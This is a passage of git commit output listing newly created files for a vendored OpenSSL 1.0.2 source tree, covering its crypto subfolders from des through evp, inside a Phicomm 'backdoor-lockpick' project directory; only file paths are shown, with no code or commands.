 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/speed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/spr.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/t/test
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/486-50.sol
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/586-100.lnx
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/686-200.fre
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/aix.cc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/alpha.cc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/hpux.cc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/sparc.gcc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/usparc.cc
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/typemap
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh1024.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh192.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh2048.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh4096.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh512.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_gen.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_kdf.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dhtest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/example
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/generate
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p1024.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p192.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p512.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsagen.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsatest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/fips186a.txt
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_beos.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_dlfcn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_null.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_openssl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_vms.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile.save
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-avx2.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/asm/ecp_nistz256-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_mult.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_oct.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_smpl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_ameth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_check.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_curve.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_cvt.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lcl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_mult.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_oct.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_pmeth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_print.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/eck_prn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_mont.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nist.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp224.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp256.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp521.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistputil.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256-x86_64.s
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256_table.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_oct.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_smpl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ectest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdh.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ecdhtest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_kdf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_key.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/ech_ossl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsa.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecdsatest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_ossl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_sign.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_vrf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_all.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cnf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_cryptodev.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_ctrl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_dyn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_fat.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_init.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_int.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_list.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_openssl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_pkey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rdrand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_rsax.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_table.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/engine.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/enginetest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_asnmth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_cipher.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dh.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_digest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_dsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdh.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_ecdsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_pkmeth.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_rsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/tb_store.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/openssl.ec
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_all.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_cast.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_des3.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_dsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc4.c
